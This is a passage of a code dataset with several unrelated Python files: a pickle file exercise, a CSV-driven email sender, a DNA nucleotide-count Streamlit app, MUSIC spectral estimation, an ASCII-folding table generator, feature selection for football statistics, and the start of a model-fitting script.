\")\r\n d[a] = y\r\n s.close()\r\n lst.append(d)\r\n pickle.dump(lst, file)\r\n file.close()\r\n file = open('static/binary3.dat', 'rb')\r\n print(\"the record is: \", pickle.load(file))\r\n file.close()\r\n\r\n\r\nmake_data()\r\n\r\n\r\ndef get_data():\r\n file = open(\"static/binary3.dat\", 'rb')\r\n a = pickle.load(file)\r\n final = False\r\n fir = int(input(\"enter the number: \"))\r\n for i in a:\r\n for key, value in i.items():\r\n if value == fir:\r\n print(\"the corresponding record of the fir no. 
\", value, ' is: ', i)\r\n final = True\r\n break\r\n if final == False:\r\n print(\"no such record !!!\")\r\n file.close()\r\n\r\n\r\nget_data()\r\n\r\n\r\ndef update_data():\r\n file = open(\"static/binary3.dat\", 'rb')\r\n s = pickle.load(file)\r\n lst2 = []\r\n for i in s:\r\n if i['year'] < 2005:\r\n s = open(\"binary3.dat\", 'wb')\r\n i['status'] = 'disposed'\r\n lst2.append(i)\r\n pickle.dump(lst2, s)\r\n s.close()\r\n file.close()\r\n file = open(\"static/binary3.dat\", 'rb')\r\n print(\"the edited record is: \", pickle.load(file))\r\n file.close()\r\n\r\n\r\nupdate_data()\r\n","sub_path":"Class 12/File_Handling/Binary files/binary_3.py","file_name":"binary_3.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"518757888","text":"# coding: utf-8\nimport csv\nimport smtplib\nimport os\nfrom os.path import basename\nfrom email.mime.application import MIMEApplication\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom email.utils import COMMASPACE, formatdate\nimport argparse\nfrom datetime import datetime\n\n\nimport logging\n\nlogger = logging.getLogger('base')\nlogger.setLevel(logging.DEBUG)\n\n# create file handler which logs even debug messages\nfh = logging.FileHandler('logfile.log')\nfh.setLevel(logging.DEBUG)\n\n# create console handler with a higher log level\nch = logging.StreamHandler()\nch.setLevel(logging.INFO)\n\n# create formatter and add it to the handlers\nformatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\nfh.setFormatter(formatter)\nch.setFormatter(formatter)\n\n# add the handlers to the logger\nlogger.addHandler(fh)\nlogger.addHandler(ch)\n\n#stupid python can not stand infinitives\nmonths = {\n 1:\"январь\",\n 2:\"февраль\",\n 3:\"март\",\n 4:\"апрель\",\n 5:\"май\",\n 6:\"июнь\",\n 7:\"июль\",\n 8:\"август\",\n 9:\"сентябрь\",\n 10:\"октябрь\",\n 11:\"ноябрь\",\n 12:\"декабрь\",\n}\n\ndef send_mail(smtp_server, send_from, send_to, subject=\"\", text=\"\", files=None):\n '''Sends email with attachments using logged smtp_server object'''\n msg = MIMEMultipart()\n msg['From'] = send_from\n msg['To'] = \", \".join(send_to)\n msg['Date'] = formatdate(localtime=True)\n msg['Subject'] = subject\n msg.attach(MIMEText(text))\n\n for f in (files or []):\n file_basename = basename(f)\n with open(f, \"rb\") as binary_file:\n part = MIMEApplication(binary_file.read(), Name=file_basename)\n part['Content-Disposition'] = 'attachment; filename=\"{}\"'.format(file_basename)\n msg.attach(part)\n\n smtp_server.sendmail(send_from, send_to, msg.as_string())\n\ndef read_configuration(config_file):\n '''Reads configuration from opened file, config format: key = value'''\n conf = {}\n with config_file as f:\n lines = f.read().splitlines()\n lines = list(filter(lambda x: x.strip() != \"\" and x.strip()[0] != \"#\", lines))\n lines = list(map(lambda l: map(lambda x: x.strip(), l.replace(\"#nl#\", \"\\n\").split(\"=\")), lines))\n for line in lines:\n k, v = line\n conf[k] = v\n return conf\n\ndef generate_subject_and_body(raw_code, file_code, subject_raw, body_raw):\n '''Generates subject and body of the letter based on raw code and dummy strings'''\n year, month, _, _ = raw_code.split(\"_\") # year_month_code_\n month = months[int(month)]\n subject = subject_raw.format(file_code, month, year)\n body = body_raw.format(month, year)\n return subject, body\n\ndef process_csv(smtp_server, csvfile, config):\n '''Processes strings from 
csvfile and returns filename of a modified copy of csvfile'''\n with open(\"tmp_\" + basename(csvfile.name), 'w', encoding=\"cp1251\") as tmp:\n reader = csv.reader(csvfile, delimiter=config.get(\"delimiter\", \";\"))\n writer = csv.writer(tmp, delimiter=config.get(\"delimiter\", \";\"), lineterminator=\"\\n\")\n for i, row in enumerate(reader):\n if not row:\n continue\n raw_code, mode, timepoint, price, raw_recepients, company_name, file1, file2, file_code = row\n recepients = list(map(lambda string: string.strip(), raw_recepients.replace(\"*\", \"\").split(\",\")))\n send_from = config.get(\"from\", \"\") \n subject, body = generate_subject_and_body(raw_code, file_code, config.get(\"subject_raw\", \"\"), config.get(\"body_raw\", \"\"))\n files = [file1.strip(), file2.strip()]\n\n should_send = True\n if mode.strip() == 'NO_SENT':\n timepoint = datetime.today().strftime(\"%d.%m.%Y %H:%M\")\n logger.debug(\"Sending email on line %s\", i)\n elif mode.strip() == \"TEST\":\n recepients = [config.get(\"test_recepient\", \"\")]\n timepoint = datetime.today().strftime(\"%d.%m.%Y %H:%M\")\n logger.debug(\"Sending email on line %s\", i) \n else:\n should_send = False\n logger.info(\"Ignoring line %s, mode = %s\", i, mode)\n writer.writerow([raw_code, mode, timepoint, price, raw_recepients, company_name, file1, file2, file_code])\n continue \n\n try:\n if should_send:\n send_mail(smtp_server,\n send_from=send_from, send_to=recepients, \n subject=subject, text=body, files=files)\n except Exception as e:\n logger.error(\"Error on line %s\", i)\n logger.exception(e)\n \n writer.writerow([raw_code, \"ERROR\", timepoint, price, raw_recepients, company_name, file1, file2, file_code])\n continue\n \n logger.info(\"Sent message on line %s\", i)\n writer.writerow([raw_code, \"SENT\", timepoint, price, raw_recepients, company_name, file1, file2, file_code])\n\n return \"tmp_\" + basename(csvfile.name)\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--config\", type=argparse.FileType('r', encoding=\"cp1251\"), \n help=\"Config file path.\")\n parser.add_argument(\"--csv\", type=argparse.FileType('r', encoding=\"cp1251\"), \n help=\"Input CSV file path\")\n args = parser.parse_args()\n\n try:\n config = read_configuration(args.config)\n with smtplib.SMTP_SSL(config.get(\"host\", \"\"), config.get(\"port\", 0)) as smtp_server: \n smtp_server.login(config.get(\"login\", \"\"), config.get(\"password\", \"\"))\n tmp_filename = process_csv(smtp_server, args.csv, config)\n csv_filename = args.csv.name\n args.csv.close()\n os.replace(src=tmp_filename, dst=csv_filename)\n except Exception as e:\n logger.exception(e)\n\nmain()\n","sub_path":"docsender.py","file_name":"docsender.py","file_ext":"py","file_size_in_byte":5970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"86846277","text":"import altair as alt\nimport pandas as pd\nfrom PIL import Image\n\nimport streamlit as st\n\nimage = Image.open('dna-logo.jpeg')\n\nst.image(image, use_column_width=True)\n\nst.write(\"\"\"\n# DNA Nucleotide Count Web App\n\nThis app Conts the nucleotide composition of query DNA!\n\n***\n\"\"\")\n\nst.header('Enter DNA sequence')\n\nsequence_input = \">DNA Query 2\\nGAACACGTGGAGGCAAACAGGAAGGTGAAGAAGAACTTATCCTATCAGGACGGAAGGTCCTGTGCTCGGG\\nATCTTCCAGACGTCGCGACTCTAAATTGCCCCCTCTGAGGTCAAGGAACACAAGATGGTTTTGGAAATGC\\nTGAACCCGATACATTATAACATCACCAGCATCGTGCCTGAAGCCATGCCTGCTGCCACCATGCCAGTCCT\"\n\nsequence = st.text_area(\"Sequence input\", sequence_input, 
height=250)\nsequence = sequence.splitlines()\nsequence\nsequence = sequence[1:]\nsequence\nsequence = ''.join(sequence)\n\nst.write(\"\"\"\n***\n\"\"\")\n\nst.header('INPUT (DNA QUERY)')\nsequence\n\nst.header('OUTPUT (DNA Nubleotide Count)')\n\nst.subheader('1. Print dictionary')\n\n\ndef DNA_nucleotide_count(seq):\n d = dict([\n ('A', seq.count('A')),\n ('T', seq.count('T')),\n ('G', seq.count('G')),\n ('C', seq.count('C')),\n ])\n return d\n\n\nX = DNA_nucleotide_count(sequence)\n\nX_label = list(X)\nX_values = list(X.values())\n\nX\n\nst.subheader('2. Print Text')\nst.write('There are ' + str(X['A']) + ' adenine (A)')\nst.write('There are ' + str(X['T']) + ' thymine (T)')\nst.write('There are ' + str(X['G']) + ' adenine (G)')\nst.write('There are ' + str(X['C']) + ' thymine (A)')\n\nst.subheader('3. Display DataFram')\ndf = pd.DataFrame.from_dict(X, orient='index')\ndf = df.rename({0: 'count'}, axis='columns')\ndf.reset_index(inplace=True)\ndf = df.rename(columns={'index': 'nucleotide'})\nst.write(df)\n\nst.subheader('4. Display Bar chart')\np = alt.Chart(df).mark_bar().encode(x='nucleotide', y='count')\np = p.properties(width=alt.Step(180))\nst.write(p)\n","sub_path":"demo/dna-app.py","file_name":"dna-app.py","file_ext":"py","file_size_in_byte":1778,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"120065502","text":"import numpy as np\nfrom scipy.linalg import toeplitz\n\n\n\n\"\"\" MUSIC (MUltiple SIgnal Classification) toolbox.\n \n Author: Raphaël Latty\n Semester Project - Guessing the fingerings\n EPFL - LCAV - Spring 2017 \"\"\"\n\n\n\ndef regular_music(x, p, M, precision_autocorr, NFFT):\n \n \"\"\" Implements the regular MUSIC (MUltiple SIgnal Classification) algorithm by constructing \n a frequency estimation function (estimate of the power spectrum).\n \n (inspired by Statistical Digital Signal Processing and Modeling, Monson H. Hayes, Chapter 8) \n \n input:\n - x: the signal to estimate the spectrum from, one-dimensional array\n - p: the presumed maximum number of sinusoids\n - M: the size of the autocorrelation matrix to use\n - precision_autocorr: the number of samples to use to \n compute the sample autocorrelation (by default, use the length of x)\n - NFFT: the number of fft bins/points\n \n output:\n - estimated_spectrum: the estimated pseudo-spectrum, one-dimensional array\n \n \"\"\"\n \n # compute the sample autocorrelation\n mid_point = int(np.floor(precision_autocorr/2))\n samp_autocorr = (1/mid_point) * np.correlate(x[0:precision_autocorr], \\\n x[0:precision_autocorr], 'same')[mid_point:]\n \n # construct the sample autocorrelation matrix\n # (Toeplitz structure from the properties of autocorrelation)\n Rx = toeplitz(samp_autocorr[0:M], np.conjugate(samp_autocorr[0:M]))\n \n # compute the eigenpairs (eigenvalues, eigenvectors)\n [eig_val, eig_vec] = np.linalg.eigh(Rx)\n \n # sort the eigenvalues in increasing order\n sorted_indices = np.argsort(eig_val)\n \n # initialize the estimated spectrum\n estimated_spectrum = 0\n \n # We consider the (M - p) smallest eigenpairs to form the freq. 
estimation function\n for j in range(M - p):\n \n # construct the estimate step by step\n estimated_spectrum += np.abs(np.fft.fft(eig_vec[:, sorted_indices[j]], NFFT))\n \n # invert the spectrum, square and convert to log scale (dB)\n estimated_spectrum = - (20 * np.log10(estimated_spectrum))\n \n return estimated_spectrum\n\n\n\ndef root_music(x, fs_recording, p, M, precision_autocorr):\n \n \"\"\" Implements the root-MUSIC algorithm by finding the roots of a suitable polynomial\n that are closest to the unit circle.\n \n (inspired by https://github.com/vincentchoqueuse/spectral_analysis_project/)\n \n input:\n - x: the signal to estimate the spectral components from, one-dimensional array\n - fs_recording: the sampling frequency of our recording\n - p: the assumed number of harmonics/spectral components\n - M: the size of the autocorrelation matrix to use\n - precision_autocorr: the number of samples to use to \n compute the sample autocorrelation (by default use the length of x)\n \n output:\n - estimated_frequencies: the estimated frequency components, one-dimensional array\n \n \"\"\"\n \n # compute the sample autocorrelation\n mid_point = int(np.floor(precision_autocorr/2))\n samp_autocorr = (1/mid_point) * np.correlate(x[0:precision_autocorr], \\\n x[0:precision_autocorr], 'same')[mid_point:]\n \n # construct the sample autocorrelation matrix\n Rx = toeplitz(samp_autocorr[0:M], np.conjugate(samp_autocorr[0:M]))\n \n # compute the eigenpairs (eigenvalues, eigenvectors)\n [eig_val, eig_vec] = np.linalg.eigh(Rx)\n \n # sort the eigenvalues in increasing order\n sorted_indices = np.argsort(eig_val)\n \n # We consider the noise eigenvectors, corresponding to the\n # smallest (M - p) eigenvalues\n V = eig_vec[:, sorted_indices[0:M - p]]\n D = V @ V.conj().T\n \n # construct the polynomial\n Q = 0j * np.zeros(2*M - 1)\n \n # extract the sum in each diagonal\n for (idx, val) in enumerate(range(M - 1, -M, -1)):\n diag = np.diag(D, val)\n Q[idx] = np.sum(diag)\n \n # compute the roots of our polynomial\n roots = np.roots(Q)\n \n # keep the roots with radius < 1 and with non-zero imaginary part\n roots = np.extract(np.abs(roots) < 1, roots)\n roots = np.extract(np.imag(roots) != 0, roots)\n \n # find the p roots closest to the unit circle\n distance_from_circle = np.abs(np.abs(roots) - 1)\n index_sort = np.argsort(distance_from_circle)\n component_roots = roots[index_sort[:p]]\n \n # extract the frequencies (in Hz)\n estimated_angles = np.angle(component_roots)\n estimated_frequencies = fs_recording * estimated_angles/(2*np.pi)\n \n return estimated_frequencies\n\n","sub_path":"python_code/MUSIC.py","file_name":"MUSIC.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"516814257","text":"#!/usr/bin/env python3\nimport re\nimport sys\nimport requests\nfrom bsdconv import Bsdconv\n\nif len(sys.argv) != 2:\n print(\"Usage: {} outfile\".format(sys.argv[0]))\n sys.exit(1)\n\noutfile = sys.argv[1]\n\ncv = Bsdconv(\"utf-8:split:bsdconv-keyword,bsdconv\")\n\ndef bc(s):\n return cv.conv(s).decode(\"utf-8\").strip(\",\")\n\nurl = \"https://raw.githubusercontent.com/apache/lucene-solr/master/lucene/analysis/common/src/java/org/apache/lucene/analysis/miscellaneous/ASCIIFoldingFilter.java\"\njava = requests.get(url).text\ntks = re.findall(r\"(?:case '(.*?)':|output\\[outputPos\\+\\+\\] = '(.*?)';|(break);)\", java)\n\nm = {}\nf = []\nt = \"\"\nfor tk in tks:\n if tk[2]==\"break\":\n 
m[t.encode(\"utf-8\").decode(\"unicode_escape\")] = f\n f = []\n t = \"\"\n elif tk[1]:\n t = t + tk[1]\n elif tk[0]:\n f.append(tk[0].encode(\"utf-8\").decode(\"unicode_escape\"))\n else:\n print(\"Unexpected Error\")\n\nl = []\nfor f in m:\n t = m[f]\n for c in t:\n print(\"{}\\t{}\".format(c, f))\n l.append((bc(c), bc(f)))\n\nl.sort(key=lambda x: (len(x[0]), x[0]))\n\nwith open(outfile, \"w\") as out:\n out.write(\"# Derived from {}\\n\".format(url))\n for f, t in l:\n out.write(\"{}\\t{}\\n\".format(f, t))\n","sub_path":"tools/gen_asciifold.py","file_name":"gen_asciifold.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"527143726","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 21 16:12:16 2018\n\n@author: Tamo\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom util import *\ng = 9.81\n\nclass Polynome_partie:\n\n def __init__(self, points, d0, w):\n \"\"\"points est un tableau 1D, contenant uniquement des ordonnées egalement espacés de w. d0 est la dérivée à l'origine.\"\"\"\n self.points = points\n self.d0 = d0\n self.w = w\n self.regression()\n self.lon = len(self.points) - 1\n \n \n def a2(self, y0, y1, y2, d):\n return (8*y1 - y2 -7*y0 - 6*d*self.w)/(4*self.w**2)\n def a3(self, y0, y1, y2, d):\n return (-4*y1 + y2 + 3*y0 + 2*d*self.w)/(4*self.w**3)\n \n def b1(self, y0, y1, y2):\n return (4*y1 - y2 -3*y0)/(2*self.w)\n def b2(self, y0, y1, y2):\n return (-2*y1 + y2 + y0)/(2*self.w**2)\n \n def regression(self):\n \"\"\"génére les coef à partir de la liste de points et de la dérivée initiale\"\"\"\n c0, c1, c2, c3 = self.points[0], self.d0, self.a2(self.points[0], self.points[1], self.points[2], self.d0), self.a3(self.points[0], self.points[1], self.points[2], self.d0)\n self.coef = [[c0, c1, c2, c3]]\n for i in range(2, len(self.points)-2, 2):\n# d = c1 + 4*c2*self.w + 12*c3*self.w**2\n# d = 0\n# c0, c1, c2, c3 = self.points[i], d, self.a2(self.points[i], self.points[i+1], self.points[i+2], d), self.a3(self.points[i], self.points[i+1], self.points[i+2], d)\n# self.coef.append([c0, c1, c2, c3])\n c0, c1, c2 = self.points[i], self.b1(self.points[i], self.points[i+1], self.points[i+2]), self.b2(self.points[i], self.points[i+1], self.points[i+2])\n self.coef.append([c0, c1, c2])\n \n def partRegression(self, partie):\n \"\"\"réalise la regression à partir d'une partie seulement (il est nécéssaire en revanche de faire tous les coefficient suivants, \n qui peuvent se retrouver changés à cause des dérivées succesives)\"\"\"\n \n# if partie <= 0:\n# self.regression()\n# return None\n# else:\n# [c0, c1, c2, c3] = self.coef[partie - 1]\n# for i in range(partie * 2, self.lon-2, 2):\n# d = c1 + 4*c2*self.w + 12*c3*self.w**2\n# c0, c1, c2, c3 = self.points[i], d, self.a2(self.points[i], self.points[i+1], self.points[i+2], d), self.a3(self.points[i], self.points[i+1], self.points[i+2], d)\n# self.coef[i//2] = [c0, c1, c2, c3]\n self.regression()\n \n\n def f(self, x):\n \"\"\"la fonction multi polynomiale. 
k et offset permettent de modifier un valeur pour le calcul des dérivées de manière efficace\"\"\"\n assert 0 <= x <= self.w*self.lon\n partie = int(x/(2*self.w))\n var = 1\n x -= 2*partie*self.w\n ret = self.coef[partie][0]\n for i in range(1, len(self.coef[partie])):\n var *= x\n ret += self.coef[partie][i] * var\n return ret\n\n def d(self):\n \"\"\"dérivée\"\"\"\n dcoef = []\n for i in range(self.len):\n dp = []\n for j in range(1, self.deg):\n dp.append(j*self.coef[i, j])\n dcoef.append(dp)\n return Polynome_partie(np.array(dcoef), self.h)\n \n def backup(self):\n self.coef_backup = self.coef\n\n def rewind(self):\n self.coef = self.coef_backup\n \n\ndef v(y, v0 = 0):\n v2 = 2*g*y + v0**2\n if v2 < 0:\n return 1e-3\n if v2 == 0: return 1e-3\n else: return np.sqrt(v2)\n\ndef temps(Pp, v0, precision = 200):\n xmax = Pp.lon * Pp.w\n X = np.linspace(0, xmax-Pp.w, precision, False) #les intervalles de X. On inclut pas la dernière valur : il y a n-1 intervalles entre n points\n t = 0\n h2 = Pp.w**2\n for i in X:\n y1 = Pp.f(i)\n y2 = Pp.f(i+Pp.w)\n t += np.sqrt((y1 - y2)**2 + h2)/v((y1 + y2)/2)\n return t\n\ndef offset(Pp, v0, k, dy, precision):\n \"\"\"décale un point du polynome; retourne le temps; ne comprend aucun backup, IN_PLACE\"\"\"\n Pp.points[k] += dy\n Pp.partRegression((k-1)//2)\n Pp.points[k] -= dy\n return temps(Pp, v0, precision)\n\n\ndef minimum(Pp, v0, k, l = 0.2, dy = 5e-4, precision = 50):\n \"\"\"Calcul du minimum de temps dichotomique sur un intervalle autour de la valeur d'un coefficient\n Pp : polynome par partie\n k : valeur où trouver le minimum\n l : largeur de l'intervalle de recherche\n dy : largeur de la dérivée\"\"\"\n f = lambda x: offset(Pp, v0, k, x, precision) #fonction que à une valeur x associe le temps décallé d'autant\n a = -l\n b = l\n while b-a > 1e-3:\n m = (a+b)/2\n if f(m+dy) > f(m-dy):\n b = m\n else:\n a = m\n return (a+b)/2\n\n\ndef plotPol(Pp):\n xmax = Pp.lon * Pp.w\n X = np.linspace(0, xmax, 200, False) #les intervalles de X. 
On inclut pas la dernière valur : il y a n-1 intervalles entre n points\n Y = []\n X2 = np.linspace(0, xmax, Pp.lon + 1)\n for i in X:\n Y.append(Pp.f(i))\n plt.plot(X, Y, \"g.\")\n plt.plot(X2, Pp.points, \"b.\")\n plt.show()\n\ndef opti(H, W, v0, etapes, points, d0 = 0, h = 5e-4, precision = 50):\n X = np.linspace(0, W, points, True)\n Y = []\n for i in range(points-1):\n Y.append(0)\n Y.append(H)\n Pp = Polynome_partie(Y, d0, W/(points - 1))\n for i in range(etapes):\n D = []\n for k in range(1, points-1):\n Y[k] += minimum(Pp, v0, k, 0.2, h, precision)\n# D.append(minimum(Pp, v0, k, 0.05, h, precision))\n# for k in range(1, points-1):\n# Y[k] += D[k-1]\n plt.clf()\n plotPol(Pp)\n plt.show()\n plt.pause(0.05)\n Xc, Yc = plotCycl(H, W)\n plotPol(Pp)\n plt.plot(Xc, -Yc, color = \"green\")\n plt.show()\n return X, Y","sub_path":"Spline.py","file_name":"Spline.py","file_ext":"py","file_size_in_byte":5844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"192549561","text":"class Solution(object):\n def canVisitAllRooms(self, rooms):\n \"\"\"\n :type rooms: List[List[int]]\n :rtype: bool\n \"\"\"\n dic = dict()\n l = len(rooms)\n for i, room in enumerate(rooms):\n dic[i] = room\n visited = set()\n\n def DFS(i):\n if i in visited: return\n\n visited.add(i)\n for room in dic[i]:\n DFS(room)\n\n DFS(0)\n return True if len(visited) == l else False\n","sub_path":"Week_03/keys_and_room.py","file_name":"keys_and_room.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"446094979","text":"import matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.svm import SVR\nfrom sklearn.feature_selection import RFECV\nfrom sklearn.cross_validation import StratifiedKFold\nfrom sklearn import preprocessing\n\nimport processing\n\nn = 4\n\n'''Unpickle pickled data.'''\ndata_sane = pd.read_pickle('data_offensive_sane.p')\n\nstats = ['Mins', 'Goals', 'Assists', 'SpG',\n 'KeyP', 'Drb', 'Fouled', 'Off',\n 'Disp', 'UnsTch', 'Starts', 'Subs', 'Age']\nylabels = ['Minutes played', 'Goals scored', 'Assists', 'Shots',\n 'Key passes', 'Dribbles', 'Fouled', 'Offsides',\n 'Dispossessed', 'Bad control', 'Starts', 'Subs', 'Age']\n\n'''Restructure dataset for analysis.'''\nprint('Restructuring DataFrame for analysis.')\ndata_ml = processing.create_attacking_player_dict(data_sane, n, stats)\nx = [point[0:-1] for point in data_ml.values]\ny = [value for value in data_ml.Y]\n\n'''Apply feature selection with cross-validation for SV regression'''\nprint('Now applying feature selection with cross-validation.')\nclf = SVR(kernel='linear', C=1e3, gamma=0.1)\nrfecv = RFECV(estimator=clf, step=1,\n cv=StratifiedKFold(y, 3), scoring='accuracy')\nrfecv.fit(preprocessing.scale(x), y) # SV data must be scaled to zero mean, unit variance!\n\n\nprint('Optimal number of features: %d' % rfecv.n_features_)\nfeatures = data_ml.columns\nprint([features[i] for i in range(len(rfecv.support_))\n if rfecv.support_[i] == True])\nplt.figure()\nplt.xlabel('Number of features selected')\nplt.ylabel('Cross validation score (nb of correct classifications)')\nplt.plot(range(1, len(rfecv.grid_scores_) + 1), rfecv.grid_scores_)\nplt.show()\n\n\nprint('done!')\n","sub_path":"OldFiles/feature_selection.py","file_name":"feature_selection.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"141121769","text":"\n#\n# 
This is the class which keeps all the data about integration,\n# computing statistics, etc\n#\n\n\nimport numpy as np\nimport math\nimport time as walltime\nimport pickle\nimport ast\n#import sys\n\nclass PData:\n \"All Integrator Data for the Program\"\n\n # -----------------------------------\n # pdict = dictionary\n def __init__(self):\n \"Init Class for Parameters\"\n self.pdict = dict()\n \n\n # -----------------------------------\n # d = another dictionary\n def update_from_dict(self, d):\n \"Update Parameter dict from another Dict\"\n self.pdict.update(d)\n\n # -----------------------------------\n # filename = string\n def update_from_file(self, filename):\n \"Update Parameter dict from file\"\n dd = dict()\n with open(filename,'r') as tmpfile:\n for line in tmpfile:\n (key, val) = line.split()\n dd[key] = ast.literal_eval(val)\n \n self.pdict.update(dd)\n\n # -----------------------------------\n def init_params(self):\n \"Init Parameters\"\n self.dim = self.pdict['dim']\n self.dim21 = int(self.dim/2 + 1)\n self.L = self.pdict['L']\n self.dx = self.L / (self.dim - 1)\n self.dt = self.pdict['dt']\n self.A = self.pdict['A']\n self.vis = self.pdict['vis']\n self.seed = self.pdict['seed']\n self.averwindow = self.pdict['averwindow']\n self.n = self.pdict['n']\n \n \n self.dtdx = self.dt/self.dx\n self.dxdt2 = self.dx/(2*self.dt)\n self.dtdx2 = self.dt/(2*self.dx)\n self.x0 = (2*np.sqrt(2)-1)**2\n self.dxl = (self.dx*self.averwindow)/self.L #change in shallow water also\n self.tpi=2*np.pi\n self.Adt=self.A/np.sqrt(self.dt)\n \n self.Tend = self.pdict['Tend']\n\n self.TstartOut = self.pdict['TstartOut']\n self.TstopOut = self.pdict['TstopOut']\n self.dtout = self.pdict['dtout']\n\n self.Tskip = self.pdict['Tskip']\n self.dtsubs = self.pdict['dtsubs']\n\n self.time = 0.0\n self.timeout = 0.0\n self.dt05 = 0.5*self.dt\n \n self.cflen = self.pdict['cflen']\n self.cflag = self.pdict['cflag']\n self.cfdim = self.pdict['cfdim']\n \n self.pdflen = self.pdict['pdflen']\n self.pdfstep = self.pdict['pdfstep']\n self.pdfmean = self.pdict['pdfmean']\n self.pdfdim = self.pdict['pdfdim']\n\n\n # messaging\n self.dtmes = self.pdict['dtmes']\n self.mes_into_file = self.pdict['MesFile']\n self.timemes = 0.0\n \n \n # compute how many steps between various things -\n \n # skipping, sub-sampling, etc.\n self.nums_subs = int(self.dtsubs/self.dt)\n self.nums = int((self.Tend - self.Tskip)/self.dtsubs)\n self.nums_skip = int(self.Tskip/self.dt)\n\n self.dimslow = int(self.dim /self.averwindow)\n self.dimslow21 = int(self.dimslow/2 + 1)\n \n self.n2dx=self.averwindow*2.0*self.dx\n self.ndx2=self.averwindow*((self.dx)**2)\n self.dtndx=self.dt/(self.dx*self.averwindow)\n \n self.cfdimslow = int(self.cfdim/self.averwindow)\n \n self.vdx2=self.vis/(self.dx**2)\n self.dx6=self.dx*6.0\n self.vndx2=self.vis/((self.dx*self.averwindow)**2)\n self.vndx22=self.vis/(self.averwindow*(self.dx**2))\n self.ndx6=self.dx*6.0*self.averwindow\n \n \n # -------------------------------\n # I also want to compute the time-interval since last message\n # and estimate the running time of the program.\n self.clockprev = walltime.clock()\n self.enerprev = 0.0\n\n self.clockstart = 0.0\n\n # -------------------------------\n # file to output time-series of energy\n self.enerfile = open('ener.dat','w')\n\n # -----------------------------------\n def compute_energy(self, u):\n \"Compute energy in Solution\"\n\n ener = 0.0\n for i in range(int(self.dim-1)):\n ener += u[i]**2\n return ener/self.dim*self.L\n \n # 
-----------------------------------\n def PrintMesProgress(self, u, dt):\n \"Print Message about Progress\"\n \"assume this function is called outside of the sub-samplig loop\"\n \" thus, we advance time by dt * nums_subs\"\n self.timemes += dt\n\n if (self.timemes >= self.dtmes - self.dt05):\n self.timemes = 0.0 \n if self.mes_into_file:\n\n clockcurrent = walltime.clock()\n ener = self.compute_energy(u)\n\n # write energy into file\n self.enerfile.write(str(self.time))\n self.enerfile.write(\" \")\n self.enerfile.write(str(ener))\n self.enerfile.write(\"\\n\")\n\n \n # write message\n tmpfile = open('mes.out','w')\n tmpfile.write(\"Computing at Time = \")\n tmpfile.write(str(self.time))\n tmpfile.write(\" \")\n tmpfile.write(\"Energy = \")\n tmpfile.write(str(ener))\n tmpfile.write(\"\\n\")\n \n tmpfile.write(\"Prev Energy = \")\n tmpfile.write(str(self.enerprev))\n tmpfile.write(\"\\n\")\n self.enerprev = ener\n\n tmp = clockcurrent - self.clockprev\n tmpfile.write(\"Wallcklock time since last mes = \")\n tmpfile.write(str(tmp))\n tmpfile.write(\" sec\\n\")\n self.clockprev = clockcurrent\n\n tmpfile.write(\"Wallclock Time Remaining\\n\")\n\n tmp = (clockcurrent - self.clockstart) * (self.Tend - self.time) / self.time\n days = int(tmp/60/60/24)\n hrs = int(tmp/60/60 - days*24)\n mnts = int(tmp/60 - hrs*60.0 - days*60.0*24.0)\n tmpfile.write(\"-- days = \")\n tmpfile.write(str(days))\n tmpfile.write(\", hrs = \")\n tmpfile.write(str(hrs))\n tmpfile.write(\", min = \")\n tmpfile.write(str(mnts))\n \n tmpfile.close()\n else:\n print(\"Computing at Time = \", self.time, \" Energy = \", self.compute_energy(u))\n\n # -----------------------------------\n def reset_timeout(self):\n \"Reset timout\"\n \n if self.output_condition():\n self.timeout = 0.0\n\n # -----------------------------------\n def advance_time(self):\n \" Advance All Time Vaiables after 1 time-step\"\n self.time += self.dt\n self.timeout += self.dt\n\n # -----------------------------------\n def output_condition(self):\n \"Return Condition to Output Soln into File\"\n cond1 = (self.TstartOut - self.dt05) <= self.time <= (self.TstopOut + self.dt05)\n cond2 = self.timeout >= self.dtout - self.dt05\n return (cond1 and cond2)","sub_path":"fbpdata.py","file_name":"fbpdata.py","file_ext":"py","file_size_in_byte":6601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"292205379","text":"#!/usr/bin/env python2\nfrom __future__ import print_function\nimport sys\nsys.path.append('../lib/')\nimport os\nimport numpy as np\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport pints\n\nimport model as m; m.vhold = 0\nfrom protocols import leak_staircase as protocol_def\n\n\"\"\"\nRun fit for single model cell experiment data\n\"\"\"\n\nsavedir = './out/'\nif not os.path.isdir(savedir):\n os.makedirs(savedir)\n\n# Load data\nimport util\nstaircase_idx = [0, 1, 0]\nf = 'data/20191011_mc3re_auto.dat'\nwhole_data, times = util.load(f, staircase_idx, vccc=True)\ntimes = times * 1e3 # s -> ms\ndata = (whole_data[0] + whole_data[3]) * 1e12 # A -> pA\n\n# Down sample...\ntimes = times[::5]\ndata = data[::5]\n\nprint('Fitting to ', f)\nsaveas = 'mc3simvc'\n\n# Control fitting seed --> OR DONT\n# fit_seed = np.random.randint(0, 2**30)\nfit_seed = 542811797\nprint('Fit seed: ', 